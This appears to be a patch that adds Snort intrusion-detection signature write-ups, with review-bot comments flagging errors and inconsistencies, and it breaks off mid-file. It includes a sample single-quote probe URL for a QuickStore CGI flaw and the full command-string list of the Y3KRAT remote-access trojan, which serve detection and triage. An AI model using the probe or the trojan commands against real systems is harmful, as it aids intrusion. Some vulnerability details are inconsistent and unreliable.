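Review bot: as in the remote file include entries, the third paragraph of Detailed Information ("validating the credentials of a client host") does not describe SQL injection; drop it and keep the first two paragraphs, which do. Fix "ona web server". Corrective Action only says to patch; for injection through a "sort" parameter it is worth adding that the application must map the parameter onto a fixed list of column names, since a sort column is an identifier rather than a bound value and parameter binding alone does not cover it. Blank lines before "--" are missing after "Sid:", Affected Systems and Contributors.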
--- /dev/null
+++ b/doc/signatures/2359.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2359
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Invision Board.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Invision Board contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root_path when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file conf_global.php.
+
+--
+Affected Systems:
+	Invision Power Services Invision Board 1.1.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root_path variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
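Review bot: "usually root" is incorrect here for the same reason as in 2366.txt; web servers run PHP as an unprivileged account. The clause "by supplying their code in the file conf_global.php" reads as if the attacker edits a file on the victim; with root_path under attacker control the include fetches conf_global.php from a location the attacker supplies, so write "in a conf_global.php served from a host they control". Double spaces in "POST  request  to". Additional References is empty; add the advisory.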
--- /dev/null
+++ b/doc/signatures/3081.txt
@@ -0,0 +1,145 @@
+Rule: 
+
+--
+Sid: 
+3081
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 server attempts to respond to a client's connect request.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
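Review bot: "HKEY_LOCAL_MACHINES" in Corrective Action is not a valid hive name; both occurrences should be HKEY_LOCAL_MACHINE. The Summary says the rule fires when the server "attempts to respond to a client's connect request" but Detailed Information never shows what that response looks like (the banner or byte sequence the rule matches); the long command list is useful for triage after the fact but does not tell the analyst what triggered the event, so add the match. Attack Scenarios is written in the second person ("he has access to your computer") unlike the rest of the corpus; rewrite in the neutral voice. Minor: "Live Shot: cap" and "Screenshot: cap" list the same command string twice.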
--- /dev/null
+++ b/doc/signatures/2323.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the QuickStore CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to the QuickStore CGI application running on a web server. This
+application does not perform stringent checks when validating the input
+from a user to the script. 
+
+The error document produced by the application may disclose sensitive
+information about the installation of the application.
+
+--
+Affected Systems:
+	QuickStore 2.12 and prior
+
+--
+Attack Scenarios:
+An attacker can supply input to the quickstore.cgi script using a single
+quote character in the "store" parameter. This will cause the script to
+generate an error and disclose the information described above.
+
+For example: http://vulnerable.com/cgi-bin/quickstore.cgi?store='
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
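Review bot: Impact claims "system integrity compromise. Possible unauthorized administrative access to the server or application", but Detailed Information and Attack Scenarios describe only information disclosure through an error page triggered by a single quote in the "store" parameter. Scale Impact down to information disclosure, or document the path from the disclosed data to administrative access if the advisory gives one. The concrete example request "http://vulnerable.com/cgi-bin/quickstore.cgi?store='" is exactly what these files should contain; keep it.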
--- /dev/null
+++ b/doc/signatures/2665.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2665
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an IMAP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the IMAP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier IMAP daemon are vulnerable to format string
+exploits prior to and during authentication to the IMAP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
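Review bot: Impact and Detailed Information disagree on privilege. Impact says code runs "with the same privileges as the user running the IMAP daemon", while Detailed Information says the attacker gains "unauthorized root access". State which it is for Courier IMAP in the pre-authentication code path, since that determines the severity. Typos: "though 3.0.2" should be "through 3.0.2", "an gain control" should be "and gain control". Since "Exploit code is available", add the advisory to the empty Additional References.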
--- /dev/null
+++ b/doc/signatures/2939.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2939
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2777.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2777
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
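Review bot: a stray line break in Detailed Information splits the last sentence so that one line consists of a lone period ("vulnerability in the procedure drop_priority" / ". This procedure is included in"); join it as "vulnerability in the procedure drop_priority. This procedure is included in dbms_repcat." Under Affected Systems, "Oracle Oracle9i" repeats the vendor name and should read "Oracle 9i". Additional References is empty even though the Summary calls this a known vulnerability with a vendor patch; a link to the Oracle advisory or CVE entry would let readers identify the patch named in Corrective Action.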
--- /dev/null
+++ b/doc/signatures/508.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+508
+
+--
+Summary:
+This event is generated when a Gopher server is used as a proxy to connect to an FTP server.
+
+--
+Impact:
+This allows a user to assume the source IP of the Gopher server when connecting to an FTP server.
+
+--
+Detailed Information:
+A Gopher server may support proxy connections to FTP servers.  This allows a user to assume the source IP of the Gopher server when connecting to an FTP server.  This may be used to bypass FTP access restrictions based on source IP's.  
+
+--
+Affected Systems:
+Any Gopher server that supports proxy connections to FTP servers.
+
+--
+Attack Scenarios:
+A user who is normally restricted access to an FTP server based on the originating IP may attempt to circumvent this by attempting access from a Gopher server that supports proxy connections to FTP servers.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+This even will trigger if a Gopher server suuports proxy connections to FTP servers. 
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the use of Gopher server.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+www.whitehats.com/info/IDS409
+
+--
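Review bot: the False Positives entry ("This even will trigger if a Gopher server suuports proxy connections to FTP servers.") has two typos ("even" for "event", "suuports" for "supports") and, more importantly, describes the intended trigger rather than a false positive; either state "None known." or explain when a legitimate proxied connection would be a false positive. "Disable the use of Gopher server." under Corrective Action is ungrammatical and broader than necessary; given Affected Systems ("Any Gopher server that supports proxy connections to FTP servers"), suggest "Disable FTP proxy support on the Gopher server, or disable the Gopher server if it is not required." The Whitehats reference lacks the "http://" scheme used by the other files in this patch.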
--- /dev/null
+++ b/doc/signatures/412.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+412
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 I-Am-Here datagram with an undefined ICMP code.
+
+--
+
+Impact:
+ICMP Type 34 datagrams are not expected network traffic.  Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 34 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
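Review bot: "Its current use it not defined by an approved RFC." in Detailed Information should read "is not defined". The False Negatives section is missing the blank line before "--" that every other section in this file has. Corrective Action repeats the second sentence of Impact verbatim; it should say what to do (for example, capture and examine the traffic from the sending host, and filter ICMP Type 34 at the perimeter if it is not used) rather than restate the impact.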
--- /dev/null
+++ b/doc/signatures/409.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+409
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Echo Reply with an invalid or undefined ICMP Code.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Echo Reply message is sent in response to an ICMP Echo Request message.  If the ICMP Echo Reply message reaches the requesting host it indicates that the replying host is alive.  Most OS's (operating systems) will accept an ICMP Echo Reply message with an invalid or undefined ICMP code set as a valid ICMP Echo Reply.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Echo Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+--
+
+Attack Scenarios:
+Remote attackers my generate ICMP Echo Reply datagrams with invalid ICMP Codes in an attempt to cause faults in the applications or hosts generating ICMP Echo Requests.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
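Review bot: the Corrective Action "Use ingress filtering to prevent ICMP Type 0 messages from entering the network." is broader than the rule: blocking all Echo Replies also drops the legitimate replies to the network's own outbound Echo Requests, which the Impact section itself describes as the normal function of Type 0. Since the Summary says the rule fires on an "invalid or undefined ICMP Code", narrow the advice to Type 0 messages with a non-zero Code. Also fix "Remote attackers my generate" ("may generate") in Attack Scenarios, "OS's (operating systems)" in Impact (just "operating systems"), and the missing blank line before "--" after False Negatives.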
--- /dev/null
+++ b/doc/signatures/2020.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2020
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via TCP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
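Review bot: the Summary ("The RPC service mountd enables clients to connect to networked file dismounted via TCP.") is not a sentence and never states what triggers the event. Based on Impact and Affected Systems ("network shares to be unmounted by anonymous hosts"), suggest "This event is generated when a request to unmount a network share is sent to the RPC mountd service over TCP." The first sentence of Attack Scenarios is a comma splice ("This is an intelligence gathering activity, the attacker could remotely unmount ..."); split it into two sentences, and the Corrective Action sentence "RPC services should not be available outside the local area network, filter RPC ports ..." has the same problem.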
--- /dev/null
+++ b/doc/signatures/1413.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1413
+
+--
+
+Summary:
+This event is generated when an SNMP connection over UDP using the 
+default 'private' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'private' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
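Review bot: the Summary says this rule (Sid 1413) covers the default 'private' community, but Affected Systems ("Devices running SNMP daemons with 'public' community enabled.") and Attack Scenarios ("servers having the 'public' community set") describe the 'public' community; those two sections should say 'private' so that the file is consistent with the rule it documents. The Corrective Action run-on ("Disable the 'public' and 'private' communities before connecting ... or block access to SNMP ports using a packet filtering firewall for unauthorized addresses.") would read better as two sentences, and "for unauthorized addresses" belongs with "block access", not with "firewall".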
--- /dev/null
+++ b/doc/signatures/1836.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1836
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "alt.binaries.pictures.erotica".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "alt.binaries.pictures.erotica".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
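Review bot: "a webpage was visited the included the content" in the Summary should read "that included the content". The False Positives sentence ends in "etc.etc.", which should be dropped. Formatting differs from the other files: "Rule:" has no blank line before "--", "Sid:" is separated from its number by a blank line, and the Additional References section is followed by six empty lines before the closing "--".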
--- /dev/null
+++ b/doc/signatures/100000575.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000575
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
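Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section are authentication-bypass boilerplate (credentials, "access an authentication mechanism") and do not describe the remote file include vector named in the Summary; the scenario should describe a request to "cat_delete.php" that passes a URL in the "admin_template_path" parameter, which is what the rule detects. Also fix "may indicate that an exploitation attempt has been attempted" (redundant; "may indicate an exploitation attempt"), "running ona web server" ("on a"), and "attackers choosing" ("attacker's choosing", in Impact and Detailed Information). The file ends with a blank line after the final "--", unlike the other files.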
--- /dev/null
+++ b/doc/signatures/2527.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2527
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
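Review bot: "compromize" in Detailed Information and "attcker" in Attack Scenarios are misspelled. Both Corrective Action lines ("Apply the appropriate vendor supplied patches", "Disable the use of PCT") lack terminal punctuation. Additional References is empty; the Microsoft bulletin that fixes this PCT issue should be linked here the same way the NetDDE file above links MS04-031, so that "the appropriate vendor supplied patches" is identifiable.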
--- /dev/null
+++ b/doc/signatures/3176.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3176
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
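Review bot: the Attack Scenarios section ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information ("malformed data via RPC", "malformed request to an RPC port"); either explain how the long filename reaches the RPC DCOM interface or align the two sections. "Expoit code exists." in Ease of Attack should be "Exploit". Additional References is empty even though Corrective Action tells the reader to apply vendor patches; link the Microsoft bulletin for the RPC DCOM issue.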
--- /dev/null
+++ b/doc/signatures/1946.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
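Review bot: the Affected Systems section is empty; given the Summary ("a web server or an application running on that server"), it should at least say "All web servers and applications that perform their own authentication." "running ona web server" in Detailed Information should read "on a web server".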
--- /dev/null
+++ b/doc/signatures/100000522.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000522
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "The Edge eCommerce Shop" application running on 
+a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cart_id" parameter in the "productDetail.php" 
+script used by the "The Edge eCommerce Shop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
